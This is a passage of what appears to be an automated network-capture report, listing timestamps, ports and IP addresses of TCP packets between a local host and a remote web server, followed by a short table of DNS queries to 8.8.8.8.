                                                                  May 28, 2021 13:00:10.545727015 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.545774937 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.545830965 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.545845032 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.545869112 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.545893908 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.545902014 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.545907974 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.545931101 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.545958042 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.546027899 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.546061993 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.546093941 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.546144962 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.611306906 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.611347914 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.611480951 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.611851931 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.611882925 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.611917973 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.611946106 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.611977100 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612015963 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612046003 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612088919 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612117052 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612142086 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612164021 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612166882 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612193108 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612206936 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612221956 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612229109 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612237930 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612257004 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612260103 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612292051 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612313986 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.612514973 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612543106 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.612621069 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.677820921 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.677862883 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.678005934 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.678280115 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.678308964 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.678899050 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.678926945 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.678951025 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.678977966 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.679003000 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.679522991 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.679548025 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.679573059 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.679598093 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.680119038 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.680160046 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.680188894 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.680212975 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.720058918 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742166996 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742257118 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742283106 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742436886 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742727995 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742758036 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.742957115 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.743052006 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.743065119 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.743098021 CEST4996180192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:10.807606936 CEST804996194.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:10.992543936 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.060571909 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.060715914 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.124895096 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.125061989 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189433098 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189477921 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189507961 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189532042 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189558029 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189584017 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189609051 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189610958 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189635992 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189661980 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189678907 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189698935 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.189701080 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189718962 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189732075 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189743996 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.189755917 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.253891945 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.253916025 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.253930092 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.253945112 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.253959894 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.253998041 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254015923 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254019022 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254091024 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254100084 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254117966 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254120111 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254128933 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254132032 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254143000 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254167080 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254192114 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254195929 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254214048 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254271030 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254292965 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254344940 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254414082 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254498005 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.254518032 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254590034 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.254676104 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.318356037 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318380117 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318392038 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318399906 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318451881 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318543911 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.318631887 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.318686008 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318705082 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318712950 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318839073 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318852901 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318860054 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318974018 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.318986893 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.319031000 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.319044113 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.319103003 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.319271088 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.319284916 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.319297075 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.358892918 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.382894993 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.382941961 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.382968903 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.382993937 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.383018970 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.383044004 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.383254051 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.383285046 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.383483887 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.429765940 CEST4996380192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.493984938 CEST804996394.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.809062004 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.873090029 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.873265982 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:11.937369108 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:11.937675953 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.004779100 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.004864931 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.004899979 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.004911900 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.004950047 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.004962921 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.004964113 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.004995108 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.005048037 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.005079985 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.005116940 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.069952011 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070003986 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070034027 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070059061 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070153952 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070192099 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070296049 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070322037 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070358992 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070389032 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070395947 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070429087 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070462942 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070626974 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070662022 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070692062 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070693016 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070722103 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070733070 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070749044 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.070774078 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070785999 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.070822001 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.071085930 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.071141005 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.071157932 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.071186066 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.071212053 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.071214914 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.071252108 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.071290016 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.134371042 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.134403944 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.134432077 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.134645939 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.134726048 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.134845018 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135036945 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135215998 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135324001 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135401011 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135437012 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135505915 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135687113 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135711908 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135808945 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135838985 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.135921955 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.136001110 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.136081934 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.136110067 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.143913984 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.208553076 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.209728003 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.209754944 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.209769964 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.210030079 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.210050106 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.210170984 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.210216045 CEST4996480192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.276408911 CEST804996494.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.811382055 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.875543118 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.875677109 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:12.942241907 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:12.942431927 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.006820917 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.006855965 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.006881952 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.006906986 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.006963968 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.007024050 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.007041931 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.007065058 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.007184029 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.007350922 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.007448912 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071377993 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071428061 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071453094 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071489096 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071492910 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071520090 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071528912 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071541071 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071546078 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071547031 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071573019 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071573973 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071597099 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071599960 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071624041 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071624994 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071649075 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071652889 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071675062 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071679115 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071696043 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071716070 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071727991 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071748018 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071763992 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071775913 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071799040 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071824074 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071893930 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.071975946 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.071989059 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.072056055 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.072067022 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.072144032 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.138226032 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138264894 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138560057 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138586044 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138614893 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138639927 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138678074 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.138709068 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139338970 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139372110 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139396906 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139431953 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139463902 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139866114 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139893055 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139911890 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139940977 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139959097 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.139977932 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.140546083 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.143807888 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:13.208252907 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208302975 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208343983 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208379984 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208410978 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208436012 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208462954 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208488941 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208513021 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208539963 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208569050 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208605051 CEST804996594.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:13.208690882 CEST4996580192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:15.415515900 CEST4996580192.168.2.394.156.175.230

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 28, 2021 12:59:51.296123028 CEST5754453192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:51.346048117 CEST53575448.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:52.140666008 CEST5598453192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:52.199002981 CEST53559848.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:53.258572102 CEST6418553192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:53.310023069 CEST53641858.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:54.505269051 CEST6511053192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:54.563441038 CEST53651108.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:56.033603907 CEST5836153192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:56.085062981 CEST53583618.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:57.263504982 CEST6349253192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:57.322232008 CEST53634928.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:58.492136955 CEST6083153192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:58.546880007 CEST53608318.8.8.8192.168.2.3
                                                                  May 28, 2021 12:59:59.612106085 CEST6010053192.168.2.38.8.8.8
                                                                  May 28, 2021 12:59:59.663435936 CEST53601008.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:00.733046055 CEST5319553192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:00.782891035 CEST53531958.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:01.916029930 CEST5014153192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:01.969630003 CEST53501418.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:03.078396082 CEST5302353192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:03.136791945 CEST53530238.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:05.546731949 CEST4956353192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:05.599652052 CEST53495638.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:08.022691011 CEST5135253192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:08.076349020 CEST53513528.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:09.192045927 CEST5934953192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:09.241920948 CEST53593498.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:10.451410055 CEST5708453192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:10.504064083 CEST53570848.8.8.8192.168.2.3
                                                                  May 28, 2021 13:00:12.236181021 CEST5882353192.168.2.38.8.8.8
                                                                  May 28, 2021 13:00:12.285936117 CEST53588238.8.8.8192.168.2.3
